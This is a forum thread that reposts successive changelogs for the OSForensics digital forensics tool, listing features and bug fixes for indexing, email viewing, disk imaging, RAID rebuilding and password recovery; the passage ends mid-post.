DVB-Cube <<< Das deutsche PC und DVB-Forum >>>

PC-Ecke => # Security Center => Software (PC-Sicherheit) => Thema gestartet von: SiLæncer am 05 Oktober, 2012, 06:00

Titel: Forensic Software diverses
Beitrag von: SiLæncer am 05 Oktober, 2012, 06:00
(http://images.six.betanews.com/screenshots/scaled/1305646367-1.jpg)
OSForensics will allow you to extract forensic data from computers, quicker and easier than ever. Uncover everything hidden inside a PC. Discover relevant forensic data faster with high performance file searches and indexing. Restore deleted files. Identify suspicious files and activity with hash matching, drive signature comparisons, and look into e-mails, memory, and binary data. Manage your digital investigation. Organize information and create reports about collected forensic data.

Freeware

Latest Changes

- Fixed indexing for drive root

http://www.osforensics.com/
Titel: OSForensics 2.0.1000
Beitrag von: SiLæncer am 31 Januar, 2013, 20:00
Latest Changes

- Support for multiple drives & folders when indexing. So an single index can now span more than drive
- Support for templates in the file indexing module. (to save re-entering data each time an index in created)
- Ability to capture pages from web sites and add them to a case (not finished in this Alpha release)
- Add support for searching multiple set of index files in a single search
- Added much improved E-mail viewer / browser
- Will open automatically if viewing an E-mail archive
- Can now add Email attachments to case
- Added the option to copy files from a case to the output directory when creating a case report (instead of just including a reference to the files)
- Changes to the Internal File Viewer
- Window can now be maximized. Minimum window size limits removed
- Minor metadata fixes
- Can now add string list to case in Hex Viewer
- Exported string list now contains string extraction settings
- Can now carve to file (and add to case) in Hex Viewer
- Can now directly open Office documents without the need for an external tool to extract the text. Should be significantly faster to open large documents in images
- The index search function in now built into OSF (so it is no longer an external .exe). This allows better persistent caching of the index which in some cases leads to much faster searches e.g. 500% times faster, for large sets of index files and search te
- Carved file can now be added to case in the raw disk viewer
- Implemented functions for reading the $I30 info file for NTFS directories. I30 data now shown in Hex View tab for NTFS directories
- WebBrowser, Added ability to add/save complete webpage to case as MHTML (.mht) file and image file. Can select region of screen to save or full screen. Free version of software will contain watermark, Pro version won't
- Changes to the raw disk viewer
- Added right-click menu to search results in raw disk viewer. In particular, users can now export the search results to disk
- 'Select Range' dialog now populates 'Start offset' with current offset
- 'Select Range' dialog shows the number of bytes between the start and end offset
- Changed UI layout to tab-based of memory viewer module. Re-organized buttons
- Bug fix when accessing zip file content on FAT16 volume using direct image access
- Fixed bug where FAT clusters were incorrectly flagged as deleted
- Several speed improvements on FAT volume with using direct image access
- Bug fix for assert errors at startup on machines with large amounts of RAM (> 32GB)
- Fixed pre-scan file counting bug relating to upper and lower case files names in the indexing module
- The last folder used for a report is now stored to avoid the need to re-enter it
- Fixed a crash on exit caused by the memviewer freeing resources that it shouldn't be freeing
- Fixed a bug that prevented case reports being generated on any drive other than the one the case resided on
- Made some changes to the Opera browser recent activity functions to prevent a possible crash
- Added toolbar for quick access to changing views in file system browser
- Fixed file name issues when exporting HFS+ files to an NTFS drive where the file name on the Mac system used characters that are illegal characters on a NTFS system
- Changed behaviour when adding emails from a search to overwrite existing ones (previously would create a second copy with a number appended to the name)
- Change behaviour so that when an email overwrites one that already exists the list view item of the old item is updated with the new title
- Added right-click function for directories in file system viewer to switch to 'Create Signature' module and automatically fill in location
- Better handling of nested e-mail/attachments in the index search function
- New indexer with fixes for index search results showing corrupted URLs for email attachments & also fixed binary string extraction skipping longer phrases
- Fixed bug in Mbox Email Reader with attachments missing characters in the filename
- Fixed progress bar for adding email and attachment to the case
- Fixed Email path issues in the file signature function
- DOS batch (.bat) files can now be run from the system information function
- Corrected an issue where the "Live system Capable" radio buttons was not checked when editing a command in system information function
- Allow right-click Copy/Copy All in the system information results tab
- Fixed buffer overflow caused by long header fields (eg. 'To:')
- More information about the index is displayed under the results window
- Changed default number of maximum search results to 1000 from 5000
- Adding logging and error conditions for searching an index
- Fixed a bug preventing FireFox recent activity history from being read when directly accessing an image file
- Fixed a bug where the location of IE & Safari recent activity entries could show uninitialised character values when directly accessing an image file
- Fixed bug when in search index function when opening a word list that contains extended ASCII characters
- Fixed bug in search index history list view when a past search query contains spaces
- Bulk searches performed via 'Browse Index' tab can now be cancelled by the user before they have completed
- Added message box after successfully carving to file in the raw disk viewer
- Fixed a bug with Chrome timestamps not being converted correctly in recent activity and new Chrome releases
- Fixed a typo in recent activity drop down (Form History)
- Fixed incorrect display of Cyrillic characters in some recent activity output (Chrome and Firefox)

http://www.osforensics.com/
Titel: OSForensics 2.0.1001
Beitrag von: SiLæncer am 05 Februar, 2013, 06:00
Latest Changes

- Added Web Snapshots category to case management for exports from the web browser module
- Added additional URL meta data to Web Snapshots (viewable from case item properties window)
- Fixed index search bug causing variant words like "testing" instead of "test" to not be found
- Fixed index search bug causing exact phrases using quote characters to not return any search results

http://www.osforensics.com/
Titel: OSForensics 2.0.1002
Beitrag von: SiLæncer am 11 März, 2013, 22:00
v2.0.1002 - 11th of March 2013

    Fixed error when attempting to select a file in the listview with no items.
    $I30 directory entries now returned even if the MFT record does not contain a $FILE_NAME attribute.
    Fixed a bug in the report template where Web Snapshots, Notes, Emails and Bookmark tables were not being sorted when their heading columns were clicked.
    Fixed a crash when changing hex view settings.
    Changes to Forensic File Copy to better handle conflicts with 8.3 names on NTFS.
    Fixed a bug in the recent activity scan on non-live systems where USB devices were not displaying a last connected time and date.
    Fixed a bug where the scroll bar was not updating on the recent activity page when using the mousewheel.
    In File Info tab, added 'Short file name' field for NTFS/FAT 8.3 short filenames.
    Fixed a bug that was preventing the recent activity module from getting windows system event information for the live system.
    Added filename and file extension sorting to index search.
    Fixed a crash when viewing/export a download recent activity record.
    Added right-click option to save file to disk for the filepath hyperlink in the Decode Window.
    Added progress bar when saving file to disk, allowing the user to cancel if taking too long.
    Fixed a crash that could occur when scrolling on the recent activity tab.
    Fixed a bug where in the recent activity items the chrome form history items could be saved with the currently registered username for OSF not the local user.
    Fixing a bug in the recent activity CSV save to case / export where the time offset was saved in the location field for MRU items.

http://www.osforensics.com/
Titel: OSForensics 2.0.1003
Beitrag von: SiLæncer am 22 März, 2013, 22:00
v2.0.1003 - 22nd of March 2013

    Forensic Copy
        Fixed Forensic File Copy not copying folder 8.3 short names.
        Made change to handle setting 8.3 short file names on files that have a read-only flag.
    Added fractions of seconds to internal viewer file properties output.
    Recent Activity - Now also searches registry location for typed IE URLs.
    System information
        Changed the dialog title to reflect that a command is being edited rather than a new command.
        Fixed a bug where if the first entry in the list was editable then it wasn't loading correctly and defaulting to the new command dialog.
        Fixed a bug where if the list management dialog was closed using the X button rather than OK the current command window display was not being updated to reflect any changes.
        Added new system information functions (Get User Info, Get Timezone, Get computer name, Get network info) that can query the registry for information, these functions can be used on the local system as well as disk images and other system drives.
    Navigation Bar - Added 'Registry Viewer' button.
    Start Page - Dialog for selecting registry file now closes when the Registry Viewer is opened.
    Registry Viewer
        Correct icon is now displayed for Find/Goto windows.
        All search types now selected by default in Find window.
        and keys now work properly for Find/Goto windows.
        Cancel button now works properly for Find/Goto windows.
        Find/Goto windows stay open after search.
        Added splitter bar and fixed resizing issues.
        Added shortcut keys for searching (Ctrl+F, F3, Ctrl+G).
        Find/Find next now traverses the tree in order according to currently selected entry.
        Added support for opening multiple registry files in one viewer
        Added icons for tree view
    Email Viewer
        Fixed bug with retrieving the HTML body using the MVCOM library. Should use _bstr_t instead of BSTR
        Changed header fields to Edit controls to fix redraw issues when resizing
        Improved parsing of Data/Time strings.
    Hex View
        Added Ctrl+C (copy hex) and Ctrl+A (select all) keyboard shortcuts
        Fixed crash carving data.
        Changed string extraction so that it no longer separates URL strings into components (eg. 'http', 'www'), this was preventing the URL filter be useful.
    Password Recovery
        Changed behaviour when recovering Firefox passwords so that is a firefox install isn't found on the drive being scanned OSForensics will also check for a FireFox install on the system drive.
        If a FireFox location is not found an error message is now displayed.
        Added warning to password recovery and system information functions when running on a live system and the permissions of the SAM registry files need to be changed

http://www.osforensics.com/
Titel: OSForensics 2.1.1000
Beitrag von: SiLæncer am 10 August, 2013, 08:00
Release Notes : >>

v2.1.1000 - 9th of August 2013

    Indexing changes;
        Will now process e-mail headers
        Added .zipx extension in filetypes to be recognized, handled as "Binary (filename only)"
        Added handling of ZIPX as "Binary (filename only)"
        Added checkbox to scan attachments in e-mails to advanced template configuration window
    Added Volume shadow copies support to the File System Browser. Currently considers a file is a shadow if the modified time of file is different from the current volume file. Steps to use this feature are,
        Add Disk Image OR Drive in forensics mode OR Disk to case
        Add subsequent Volume Shadows for just added device.
        Load File system browser and enable Show shadows under options menu.
        Browse (the shadow copy files text/label will be a shade of grey).
    Added "Add All" Volume Shadow Copies option to Add Device dialog window.
    Added "loading" dialog box when parsing shadow copies.
    Shadow copies can now only be loaded for devices that are already added to case.
    Improved performance when using shadow copies as a result of caching data in RAM. This should also allow larger drives to be examined in a reasonable amount of time.
    Added button to FSB Toolbar that launches a module to perform volume "diffs" for shadow copies, it behaves similarly to the Create/Compare signature function.
    Added keyboard shortcuts to Internal file and email viewers.
    Raw disk viewer searches are no longer aborted when the search window is hidden.
    Made some change to the Chrome download section in recent activity to work with newer chrome versions (26.0.1410.64) as the database structure has changed.
    Can now select 'Use entire image file' when selecting a partition from an image file.
    Added Loading progress indicator for the advanced EmailViewer
    When an error occurs when adding multiple items to case, added a Message Box to prompt if user wants to continue (or quit). This avoids a situation where hundreds of error boxes might otherwise be displayed in a loop.
    Raw disk viewer decode window can now identify a dynamic volume as "Windows dynamic volume (LDM)
    Can now detect dynamic volumes in dynamic disks (LDM)
    In the 'Drive imaging' module, added 'Rebuild RAID' tab for rebuilding a single RAID image from multiple source disk images. Support for auto-detecting Intel Matrix RAID (IMSM) & software RAID was included. Additional auto-detecting features for other RAID formats are expected to be supported in future releases. Added support for manually changing image file offset/size for RAID rebuilding.
    Rebuilding RAID images for the following RAID metadata types
        SNIA DDFv1
        Highpoint v2 RocketRAID
        Highpoint v3 RocketRAID
        Adaptec HostRAID
        Integrated Technology Express RAID
        JMicron RAID
        LSILogic V2 MegaRAID
        LSILogic V3 MegaRAID
        nVidia MediaShield
        Promise FastTrak
        Silicon Image Medley RAID
        Silicon Integrated Systems RAID
        VIA Tech V-RAID
        (Note that not all permutations have been tested)
    Added RAID 0+1, RAID1+0, RAID 3, SPANNED rebuilding support
    RAID "Info" dialog now shows the metadata for all matching RAID formats
    Can select between multiple RAID metadata types if multiple formats detected
    Added HPA/DCO imaging. This allows hidden area on the disk to be made accessible for copying. HPA = Host protected area. DCO = Device configuration overlay. Note that on some drives there is locking that will prevent changing the HPA/DCO disk extent limits.
    Carved files will now have FILETIME set to Jan 1, 1601 12:00 PM when the real date information is not recoverable.
    File Carving percent complete display bug fix.
    File Carving put more safety checks when carving Zip / OfficeXML files to prevent crash.
    Thumbnail Viewer, fixed a problem with thumbnails without a visible size being drawn as black box
    Fixed some potential memory allocation in the internal file viewer issues when viewing buffers. (Which is how deleted files are viewed).
    Fixed a crash that could occur in recent activity during the IE URL scan, some URL paths were longer than expected
    Added 'Info' button to retrieve and display the RAID metadata from an image file in the Disk Imaging module.
    Added ability to open Internet Explorer IE10 history databases and retrieve visited URLs (Vista and newer only). IE10 has a new internal format for storing this data compared to previous releases.
    Updated document indexer to handle indexing recursive PST files (PST and MSG files attached to E-mails inside PST files).
    Fixed issue where "Add to Case" menu item was enabled when a case is not yet opened.
    Fixed some memory leaks when indexing emails and attachments.
    Fixed Email Viewer appearing (with no error messages and no emails) when PST file cannot be opened (e.g. because Outlook is open and holding access). It now shows an error message and destroys the Email Viewer window before it displays.
    Fixed EmailViewer appearing (with truncated email contents) when user hits "Cancel" during PST loading
    Fixed the EMail viewer's handling of embedded emails (.msg files attached to a .msg file) in the EmailViewer.
    Made some changes to stop a reported crash in the registry viewer.
    Fixed a bug with the Windows Login Password when using "Live acquisition of current machine", a required registry permissions was failing to be set correctly
    Old/simple PSTViewer is now restored in project and used when PST file is > 10GB
    Changes to try and stop the recent activity/registry viewing crashing in invalid data circumstances (causes by null records in the registry).
    Added help context for Volume Shadow Copies.
    Help file updates for HPA / DCO hidden areas in Disk Imaging and 'RAID Rebuild' functionality.

http://www.osforensics.com/
Titel: OSForensics 2.2.1000
Beitrag von: SiLæncer am 10 September, 2013, 22:00
Whats new: >>

· Added support for creating a self booting USB solution from the "Install to USB" section, this is a new tool called "WinPE builder" that can be launched after the "Install to USB" process.

http://www.osforensics.com/
Titel: OSForensics 2.3 Build 1 Beta
Beitrag von: SiLæncer am 05 November, 2013, 14:30
Whats new: >>

Increased copy to clipboard limit from 100 to 10,000 files

Password Recovery:

Added "a-z A-Z 0-9" Alphanumeric option to password recovery random character options
Added scanning of windows credential manager for browser passwords as part of the recent activity function.
Updated the Firefox password recovery feature to work with the latest version of Firefox (24)
Fixed a bug where if there was only one password entry stored in the Firefox database it was not displayed

File System Browser:

Added extra metadata column for the LCN of the first cluster of the file. This is useful for seeing if files are grouped together on the disk.

Drive Preparation:

The Write pattern function, could incorrectly report a write error near the very end of the drive for some USB flash drives, this has been corrected.
Changed the error message when adding an image file to a case to include the image name.
Updated "Print" features for EmailViewer and PstViewer
Fixed a bug with HTML email printing not having any header
Fixed a bug with not printing full headers, RTF, and plain text mail

http://www.osforensics.com/
Titel: OSForensics 3.0.1000
Beitrag von: SiLæncer am 16 Juli, 2014, 22:00
Release Notes

New Modules:

    ThumbCache viewer for viewing cached thumbnails stored in the Windows thumbnail cache database (Windows Vista and later only)
    ESE database viewer for viewing the records stored in ESE database files (.edb). ESE database format is used by a variety of Microsoft applications and can often contain data of forensics value.
    Prefetch Viewer for viewing the application prefech data stored by the operating system's prefetcher. This data includes when the application was last run and how frequently it has been run.

Case Management

    Added option to "Make case default" when adding a device to a case so it is selected by default for future actions
    When deleting cases, added prompt to allow the case files to be saved to another location before deleting
    Adding attachments from case devices now supported
    Multiple image partitions can now be mounted at the same time
    VHD image files can now be mounted
    Added 'Repeat action' checkbox to message box when adding a file already existing in case
    Fixed a bug that was preventing undeleted files from being exported as part of a report
    Fixed bug with selecting default drive when creating case. Also removed current case's devices from default drive dropdown list.
    Fixed issue with setting newly mounted drives as default drive
    Fixed bug with condensing white space when reading .OSFCfg files
    When adding shadow drives, fixed combo box not being reset when changing drive selection
    Changed the error message when adding an image file to a case to include the image name.
    Fixed a bug preventing bookmark tables in reports from being sorted

Deleted Files Search

    Searching for deleted files in HFS+ drives now supported
    Results can now be displayed in 'thumbnail' and 'timeline' view
    Timeline view now shows stacked bars grouped by file extension
    Fixed overall system slowdown caused by large blocking file reads when file carving
    Removed right click menu options that aren't unsupported by the file system
    Fixed a crash when pressing a key with nothing selected
    Fixed deleted directory icon not being displayed for non-NTFS file systems
    Fixed deleted file fragmentation info not displaying for NTFS case devices
    Fixed crash with invalid memory access when searching for ext2 deleted files

File System Browser

    Added extra metadata column for the LCN of the first cluster of the file. This is useful for seeing if files are grouped together on the disk.
    Deleted files/directories can now be displayed (in red text). Added menu option to enable deleted files to be displayed.
    Added right-click menu option to attach selected files to case
    Attribute modify date is now displayed for ext2 file systems
    Fixed deleted icon overlay so that it displays correctly on XP

File Indexing

    Indexer updated to the new Zoom Engine, which includes support for real-time logging
    Indexing now supported for Shadow Volumes
    Timeline view now shows stacked bars grouped by file type
    Multiple history items can now be added to case
    Multiple history items can now be deleted
    Changed indexing/searching limit to 25000 items for Free version
    Optimized index search by not reloading dictionary for every search
    Fixed a crash when indexing multiple partitions mounted from image files
    Fixed potential Thumbnail view crash due to lists being deleted while thumbnails are loading
    Fixed bug with DBX message count not being included in total e-mail count
    Fixed Custom Limits not being saved/applied in Edit Template.
    Fixed 'default' button not deselecting non-default filters in log window
    Fixed unallocated cluster indexing not working for drives mounted in Standard mode
    Fixed timeline date filter not filtering items correctly
    Fixed regex filter combo box in 'Browse Index' tab showing invalid characters
    Fixed invalid characters showing up in 'History' under the 'Settings' column

File Name Search

    Timeline view now shows stacked bars grouped by file extension
    Deleted files/directories can now be displayed (in red text). Added menu option to enable deleted files to be displayed.
    Attribute modify date now displayed for ext2/hfs file systems
    Fixed a memory leak when closing window

Hash set lookup

    Added list of matched files when performing hash set look up of more than 1 items. The list view contains a list of files that are found in the hash set. Previously, only the number of matches are displayed without any information on the files that matched.
    Added support for deleted files hash lookup

Internal Viewer

    Metadata viewer tab now displays $I30 entries (normal + deleted) for NTFS directories
    Metadata View tab now displays EXIFTool metadata for deleted files
    Metadata View tab now displays carved $I30 records for deleted directories
    Added jump to index right-click menu option
    Deleted files opened from the file system browser can now be viewed
    Thumbnail cache data opened from the ThumbCache viewer can now be viewed
    File Info tab now shows the file's starting LCN
    Increased the default number of strings limit in Hex view tab to 50,000. Increased the max number of strings limit to 1,000,000
    Improved loading and caching of files
    Reduced file loading time by optimizing file system accesses
    Ctrl-C (copy)/Ctrl-A (select all) keyboard shortcuts now work in Text View
    Fixed minor issue in File Info tab with short filenames appearing incorrectly
    Fixed bug with hex viewer string extraction not stopping when max # results reached
    Fixed viewer string extraction omitting words in results
    Fixed 'Copy ASCII' in Hew view tab to copy all characters other than '\0' to clipboard
    Fixed icon transparency not displaying correctly in Windows 8
    Fixed metadata view tab showing icons when displaying EXIF metadata
    'Unsupported file type' text is now displayed when failing to convert document files to text
    'Fixed crash due to buffer overflow bug with handling Excel document conversions

Email Viewer

    Added support for searching message body
    Added support for date filtering
    Updated "Print" functionality
    Fixed a bug with HTML email printing not having any headers
    Fixed a bug with not printing full headers, RTF, and plain text mail

Recent Activity

    Added scanning of Windows search database (Windows.edb) index records
    Added scanning of prefetch items
    Added scanning of windows credential manager for browser passwords
    Added 'Config' window for configuring scan options (date range, items to scan)
    Added additional filter for MRU sub-categories when filtering by 'MRU'
    Timeline view now shows the breakdown of activity types via stacked bar graph
    Changed behaviour when using the right click "Export to" options in the timeline so only the items from the active timeline section are included (previously all the found items were exported)
    Timeline view is now synchronized with File List view
    Removed 'Summary' button. Summary dialog now appears when clicking the 'Total Items' hyperlink
    Fixed crash when pressing 'Enter' with nothing selected
    Fixed item selection when 'End' is pressed
    Fixed stack overflow bug
    Fixed error when opening the selected item with the registry viewer
    For Chrome downloads, results now show filename from source URL if destination download path unavailable
    Fixed scanning of IE history not working for certain versions of IE
    Fixed a bug preventing the name of items from being output correctly for CSV export

Mismatch search

    Added text colour to "Identified Type:" field for emphasis
    Fixed a bug that was causing a crash when adding a file to a case

SQLite Browser

    Files saved in temp folder are removed when exiting
    Fixed unitialized pointer bug when exiting program

Password Recovery

    Added "a-z A-Z 0-9" Alphanumeric option to password recovery random character options
    Updated the Firefox password recovery feature to work with the latest version of Firefox (24)
    Fixed a bug where the password was not displayed if there was only one password entry stored in the Firefox database
    Updated error message to show correct error code when permissions prevented some registry changes
    Fixed crash when adding .rti rainbow tables without valid file segments
    Under 'Generate Rainbow Table' tab, moved the character set definition in the combo box to an edit control due to length
    Under 'Generate Rainbow Table' tab, changed character set combo box to non-editable

Drive Preparation

    Fixed Write pattern function incorrectly reporting a write error near the very end of the drive for some USB flash drives

Drive Imaging

    Restoring VHD image files now supported
    Disk image name and type is now maintained when using the browse button (if already entered)
    Fixed bug with imaging drives as Encase files

Install to USB

    Added window message processing during the USB installation process so the application doesn't display as "Not responding"
    Disabled Install/Exit/Browse buttons when install process starts
    Stopped "Install to USB" function from working when not installing to a USB/removable drive

Web Browser

    No longer creates a web browser temporary dir as it was not being used and was not being cleaned up properly after program exit.

Misc

    Deleted files are now supported in thumbnail view
    Various performance improvements when loading thumbnails in thumbnail view
    Fixed display of files without high resolution icons in thumbnail view. Previously this meant a tiny icon was drawn
    Deleted file thumbnails now show the proper icon/thumbnail with a deleted overlay flag in thumbnail view
    Fixed crash caused by bug with retrieving the file icon in thumbnail view
    Fixed crash caused by overflow of the label exceeding 260 characters in thumbnail view
    Added support for stacked bar graphs via groups in timeline view
    Fixed bug when the data spans greater than 30 years in timeline view
    Increased copy to clipboard limit from 100 to 10,000 files
    Fixed a crash when handling compressed files on NTFS for cluster sizes <4KB
    Redirected stdout containing Unicode characters should now work correctly (eg from System information tools)
    Fixed some flickering when adding files to case
    Updated OSFMount to v1.5.1015
    Fixed several crashes that could occur when closing OSF
    Fixed crash when attempting to shadow copy files from a drive mounted in standard mode
    Non-raw image files that cannot be opened properly will be opened as raw
    Reduced flickering when resizing window
    Fixed copying of shadow copies of locked files into temporary directory

[close]

http://www.osforensics.com/
Titel: OSForensics 3.0.1001
Beitrag von: SiLæncer am 20 August, 2014, 12:17
Release Notes
v3.0.1001 - 19 of Aug 2014

    Case Management
        Images/drives without valid partition/file system info (ie. boot sector) can now be added to the case. This allows the drive to be viewable using the Raw Disk Viewer.
    File Indexing
        Added support for indexing extracted binary text from "hiberfil.sys" and "pagefile.sys" (not limited by max file size limit)
        Fixed stemming problems during indexing
        Fixed bug with updating indexing status causing small indexing jobs to report no files being indexed
        Fixed bugs with identifying misnamed ZIP files during indexing
        Updated Engine/CGIs to V7 build 1008
        Image search results that are nested in archives are now displayed in the 'Images' tab
        Image search results that are nested in archives are now displayed with an 'archive' overlay on the top left corner of the icon
        Fixed bugs with accented characters in search result URLs
        Fixed bug with opening search results in the Internal Viewer
    Deleted Files Search
        Fixed bug in file carving of .mov files (was including 4 additional bytes in the end, now removed)
        Fixed file carving of .pdf files. Will now check buffer for four known combination for end markers. If not found, will default to look for %EOF.
        Fixed scanning of deleted files on mounted drives without partition information
    Raw Disk Viewer
        Fixed divide by error bug when performing a raw disk search on a disk with sector size = 0
        Fixed partition info in the Decode window not being updated correctly when a new disk is loaded
    Web Browser
        Module Will now load on first use instead of loading on startup. Starting Page is now set to about:blank (was set http://www.osforensics.com ). This minmises the impact on a live target system when running OSF from a USB drive.
    Internal Viewer
        Fixed image stored in the alternate stream of a file not being displayed
    Misc
        Fixed bug with FAT file system parsing caused by truncating errors when calculating cluster offset. This could prevent some FAT partitions from being mounted when the FAT partition's starting offset was a long way from the start of the disk.
        Added debug statements to FAT file system parsing (when DEBUGMODE mode is enabled)
        Added debug statements when there are NTFS file system parsing errors in applying fixup values to MFT and index records (when DEBUGMODE mode is enabled)
        Updated WinPEBuilder.exe to include more debug messages.
[close]

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1000
Beitrag von: SiLæncer am 19 November, 2014, 13:30
Release Notes

Email Viewer:

Only one instance of the e-mail viewer window is now available and shared amongst all modules. This allows e-mail messages to be opened instantly without having to reload the e-mail file if it was previously opened.
Partially loaded e-mail files (ie. cancelled halfway during loading) are no longer allowed and removed from the tree view
Added support for recovering deleted and orphaned e-mails in PST files
Added status bar on the bottom of the window to indicate the number of items in the current folder
Fixed header field (From, To, Cc) text not showing when text length is too long
Fixed saving attachments with invalid filename characters
Added implementation to save PST emails with embedded message attachments in MSG format.
Removed storage of e-mail file path for each mail item to reduce memory usage
Fixed a crash when closing e-mail viewer while still loading e-mail/searching

Direct Access:

Reduced the memory usage for VMDK, VHDI and raw images
Cache data is now share globally per device rather than per device/thread. This reduces memory usage and increases performance

NTFS:

Fixed loading of $MFT file split into multiple MFT records
Added caching of ATTRIBUTE_LIST to improve performance
Fixed a possible crash when saving to disk

Internal viewer:

Fixed a crash related to merged cells when converting excel document to html
Fixed a bug with POLE library causing large files to be saved improperly
Fixed hex view showing incorrect bytes while performing search

Forensic Copy:

Fixed error message preventing files to be copied to a windows drive destination

File Indexing:

Added support for indexing .tar, .gz, .tar.gz, etc.
Added BinStringsUseBigram option for create index binary string extraction settings, Code words and Extreme
Added options to index "System hibernation and paging files"
Changed email prescan estimate to handle more cases
Added a MAXPAGES min. cap of 100,000 pages when scanning attachments
Fixed a bug with not detecting if wordmap merging failed mid write due to out of space or other causes.
Fixed a bug with free edition not indexing PDF files properly (indexed as html)
Fixed a bug with not being able to perform searches on indexes created within a folder path that contains Unicode character (e.g. unicode characters in user name or in case name)
Fixed an issue with not scanning text files (non plugin files) when scan .sys files is enabled.
Fixed a bug with an infinite loop when indexing a file misnamed as DOC (e.g. a RTF file)
Fixed several bugs when indexing emails

Recent Activity:

New user interface, summary of items shown in left hand treeview side, added filters, new sortable list
Updated to work with latest version of opera (23)
Now searching localised folder names so should return more results on non-english installs of Windows
Now searching more registry locations for installed programs so far more results should be returned
Fixed a bug where registry locations of some installed programs weren’t displayed fully
Fixed some issues when trying to get recent activity from non-system drives

Drive Preparation:

Improvements to Disk preparation error messages.
Improvement to the Drive preparation progress update.

Disk Imaging:

Raid rebuilding, fixed detection of RAID metadata for Promise RAID controllers

[close]

http://www.osforensics.com/
Titel: OSForensics 3.1.1001
Beitrag von: SiLæncer am 16 Dezember, 2014, 13:00
Release Notes

Case Management

Fixed potential deadlock after clicking 'Cancel' when items are being added to the case
Fixed 'To' field missing in e-mail case properties
Fixed 'From', 'To', 'Subject' fields missing in case report
Removed check for empty e-mail headers (From, To, Subject, etc...) when adding e-mail to case. Adding warning to log file instead.

Email Viewer

When exporting e-mails to file/case, 'Print-friendly' HTML file is now generated. Currently, only HTML/text is supported.

File Indexing

Indexer updated to the latest Zoom Engine
Fixed a bug when indexing email attachments with accent characters in the folder path
Fixed infinite loop bug when indexing corrupted ZIP files
Fixed a crash bug with indexing MSI files (and any other files that can be misidentified as DOC)
Added error message when handling bad ZIP files./li>
Added default handling of .msi files as binary (filename only) format.

Recent Activity

Will now return files/folder from user's Recent Item folder (shell folder)
Added Support for Word 2013 Reading Locations to Recent File List Item
Added Support for Office 2013 (Word, PowerPoint, Excel) Recent File List
Added Adobe Acrobat Reader MRU locations
Now also parsing the subkeys to Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\\.xxx, where .xxx is file extension to retrieve more information
Added Right Click Menu Option - Copy Row to Clipboard
GUI Fixes, Help File Link Update
Added Filter for text search of all fields for an activity type
Installed Programs, if there is no program name, will return registry location as the title.

Registry Viewer

When opening key paths containing SYSTEM\CurrentControlSet which is a volatile symbolic link, replaced with 'ControlSet00n' where n is the current control set

Search Index

Improved performance of adding PST e-mail/attachments to case by using the same e-mail file handle, instead of opening and closing for every e-mail message

[close]

http://www.osforensics.com/
Titel: OSForensics 3.1.1004
Beitrag von: SiLæncer am 16 Januar, 2015, 12:24
Changelog
V3.1.1004 - 16th of Jan 2015

    Email Viewer
        Added handling of rfc2047 encoding in subject/address fields of MIME headers
        Fixed buffer overflow in status message while recovering deleted e-mails in PST files
        Fixed 'S' shortcut key being processed instead of 'Ctrl+S' to add attachments to case
        Fixed a bug with saving embedded message in PST/OST files as .msg. LIBPFF_ENTRY_TYPE_ATTACHMENT_DATA_OBJECT property was being saved as a stream instead of storage
    ESEDB Viewer
        Fixed population of known ESEDB files to use localised folder names instead of hard-coded locations
    File Indexing
        Pre-scanning can now be cancelled while scanning PST messages
        Updated Zoom indexer to fix some crash issues
        Updated Zoom Office XML plugin
        Improved length limit for meta fields in email files (used for FROM/TO/CC/BCC) from 255 characters to 65,535 characters.
        During indexing, fixed Total Bytes/Peak Physical Memory/Peak Virtual Memory not updating properly when > 2GB
        Fixed crash bug with buffer overflow and infinite add URL when indexing .MSG file with many attachments
        Fixed bug with only using last filename for all attachments of the same .MSG file
        Fixed bug with losing generated body text with attachment filenames "Attachment(s): ... , ..." for .MSG file indexed.
        Fixed bugs with indexing plain text emails in .MSG files
        Fixed bugs with indexing Chinese PST files (metafield length limit caused Unicode corruption)
        Fixed bug with possible Unicode string corruption when longer than available buffer (with languages such as Chinese with 4 char MB UTF-8 characters)
        Fixed a bug with files sizes not being indexed in offline mode
        Fixed a potential crash caused by long URLS
        Fixed a crash during pre-scanning when indexing unallocated clusters
        Fixed bug with search index failing on old format index files after a search with new format index files.
        Fixed DOCX plugin that split words incorrectly due to revision history
        Fixed crash bug with XLS files with invalid cell.templateID values
    Import Hash
        Fixed String/Buffer overflow during import progress updates (if import folder name is too long) by increasing string size
    Internal Viewer
        If viewing an excel document that is password protected it will now display a relevant error message
    Password Recovery
        Shadow copy now used if registry file is locked
    Recent Activity
        Now attempting to get the localised name for the "Documents and Settings" folder from the registry when starting a recent activity scan so more information will be retrieved on non-english Windows installations.
        Shadow copy now used if registry file is locked
        Should now resolve shortcut (.lnk) files in User's Recent Items folder (when not using live acquisition scan option).
        Fixed scanning of system registry hives when no user hives are found
    Search Index
        Fixed processing of FILETYPE_MSG and FILETYPE_ATTACHMENT_MSG index results
    System Information
        Shadow copy now used if registry file is locked
    ThumbCache Viewer
        When looking up default Windows.edb location, now using localised folder names instead of hard-coded locations
    WinPE Builder
        Updated build of WinPE Builder. (Allows user to set NTFS filesystem with command line argument '-f'. Not enabled by default, since FAT32 supports booting both BIOS-based and UEFI-based PCs. UEFI based systems require that the boot files reside on FAT32 partition. If they are not on FAT32 the system may not see the device as bootable.)
    Misc
        Fixed bug with handling of NTFS files with mix of compressed/non-compressed fragments
        Help file updates
[close]

http://www.osforensics.com/
Titel: OSForensics 3.1.1005
Beitrag von: SiLæncer am 18 Februar, 2015, 12:24
Changelog

File Indexing

    Updated Zoom indexer to fix some crash issues
    Bug fixes when indexing DOC and XLS files inside ZIP files

Install to USB

    WinPEBuilder will launch with option to format USB drive filesystem as NTFS.

Password Recovery (Browser Passwords)

    Fixed a bug with chrome and opera password recovery where the wrong password could be displayed in some cases (out by 1 place in the list) or no password might be displayed despite not being blacklisted

System Information

    Fixed a bug that was displaying an error message when trying to run a custom command on the system information tab when using a selected drive

[close]

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1006
Beitrag von: SiLæncer am 05 März, 2015, 09:13
Changelog

Case Manager:

Before deleting search indexes they will now be unloaded if currently in use rather than displaying an error message

Email Viewer:

Added check for if the recipient address is in X400 format. If so, try to obtain the SMTP Address instead.

File Indexing:

Fixed a crash caused by partially compressed NTFS drives
Fixed bug with missing title and from addresses from index
Fixed bug with PST files not opening from search results due to incorrect/corrupt path
Fixed bug with x400 email address format when smtp format available for recipients.

Password Recovery:

Windows login passwords: Added recovery of cached domain users, updated help file to match new UI and functions.

Install to USB:

